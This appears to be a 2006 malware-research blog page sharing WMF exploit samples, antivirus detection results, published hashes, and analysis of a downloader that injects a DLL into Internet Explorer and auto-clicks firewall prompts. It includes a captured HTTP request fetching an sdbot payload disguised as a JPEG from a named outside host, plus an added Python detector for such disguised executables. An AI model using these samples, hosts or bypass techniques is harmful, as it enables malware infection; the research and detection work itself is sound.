For love of the old school and keeping it real I've run some older malware through some modern AV/MW detection software. Interesting results:
Found Email-Flooder.Win32.Weirder (probable variant)
Norman Virus Control
Hey all, I've been pretty busy with the new baby, however I do have a request.
Anyone have a copy of the WMF construction kit?
Just another downloader, fully reversed into C code. I've picked it up a few days ago and sent to AVs, so most of them have signatures by now:
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)
I have some wmf exploit files.
Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Here's some pretty pictures:
So sdbot05b.jpg gets turned into command.pif:

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
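The capture above shows the classic downloader trick: an "image" URL (sdbot05b.jpg) whose body is really an executable that gets written out as command.pif. The following Python is an added example, not code from the original post or from Offensive Computing; it parses a raw HTTP response, sniffs the body's magic bytes, and flags a download whose real type (a PE file) contradicts the extension in the request path or the Content-Type header. The two MD5s are the ones published in the bumXXX.exe / tioXXX.dll post on this page; the response bytes, including the Content-Type header, are constructed for the example (the original capture does not show one).

```python
import hashlib

# Published IoC hashes from the bumXXX.exe / tioXXX.dll post on this page.
KNOWN_BAD_MD5 = {
    "fe3b1e317846e0f398af27954dd09c93",  # bumXXX.exe
    "2ae5ed3edd6925d6117548cf1e9f3c52",  # tioXXX.dll
}

# Magic bytes for the types a downloader "picture" usually claims to be.
MAGIC = [
    (b"MZ", "pe"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
]

# Claimed types, by Content-Type and by URL extension, mapped to the same labels.
CONTENT_TYPES = {"image/jpeg": "jpeg", "image/png": "png", "image/gif": "gif"}
EXTENSIONS = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif",
              "exe": "pe", "pif": "pe"}


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers found")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return status, headers, body


def sniff_type(body: bytes) -> str:
    """Identify the body by its leading magic bytes, ignoring what the server claims."""
    for magic, label in MAGIC:
        if body.startswith(magic):
            return label
    return "unknown"


def check_download(request_path: str, raw_response: bytes) -> dict:
    """Compare the claimed type of a download with its real type and known IoC hashes."""
    _status, headers, body = parse_http_response(raw_response)
    ext = request_path.rsplit(".", 1)[-1].lower() if "." in request_path else ""
    claimed_by_ext = EXTENSIONS.get(ext)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    claimed_by_ctype = CONTENT_TYPES.get(ctype)  # None for octet-stream or missing
    actual = sniff_type(body)
    md5 = hashlib.md5(body).hexdigest()

    reasons = []
    if actual == "pe" and claimed_by_ext not in (None, "pe"):
        reasons.append(f"executable served as .{ext}")
    if actual == "pe" and claimed_by_ctype is not None:
        reasons.append(f"executable served with Content-Type {ctype}")
    if md5 in KNOWN_BAD_MD5:
        reasons.append("body matches a published IoC hash")
    return {"path": request_path, "claimed_ext": claimed_by_ext, "content_type": ctype,
            "actual": actual, "md5": md5, "suspicious": bool(reasons), "reasons": reasons}


# Constructed responses modelled on the capture above (not real samples).
_HEADERS = (b"HTTP/1.1 200 OK\r\n"
            b"Date: Mon, 02 Jan 2006 05:24:45 GMT\r\n"
            b"Content-Type: image/jpeg\r\n\r\n")
FAKE_JPEG_RESPONSE = _HEADERS + b"MZ\x90\x00" + b"\x00" * 60   # PE stub disguised as a JPEG
REAL_JPEG_RESPONSE = _HEADERS + b"\xff\xd8\xff\xe0" + b"\x00" * 16  # genuine JPEG header

if __name__ == "__main__":
    for raw in (FAKE_JPEG_RESPONSE, REAL_JPEG_RESPONSE):
        result = check_download("/sdbot05b.jpg", raw)
        print(result["actual"], result["suspicious"], result["reasons"])
```

Run over a proxy or IDS log, the same check catches every "image" that starts with MZ regardless of which host it comes from, which is a far more durable signal than the hostname or the URL in this one capture.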
We had a healthy baby boy born this morning at 6:57am so I'll probably not be posting much for a little while.
Have a happy new year!!
A couple of things:
To all my military / government visitors. I notice people visiting but not logging in. If you would like an account but don't want to go through the normal sign up process, or don't have a public email you can use, feel free to let me know and I'd be happy to set you up an account.
A general thing, the file upload is broken. I am working on fixing it but no luck so far. Basically when you go to upload a file and hit add you will see a bunch of errors. However if you scroll down and hit submit, it still uploads successfully regardless of the errors. People can also just email me and I will post for them / give credit. Zip everything and password protect it with "offensivecomputing" so it will send.
These files compose a downloader from the original WMF exploit posted on bugtraq. It is composed of two parts:
bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52
tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into a spawned iexplore.exe for downloading additional components. It also tries to bypass firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to the firewall confirmation dialog.
Also bumXXX.exe is packed with PE Compact. I just ran it and dumped its memory image, and fixed the IAT manually; the only PE Compact unpacker I found didn't work :/
Sometime today we crossed the 100k hits mark!
Not bad for a couple of weeks time with only really 3 days being truly public.
Welcome to all the visitors.
Now, about contributing some analysis, signatures, etc. :)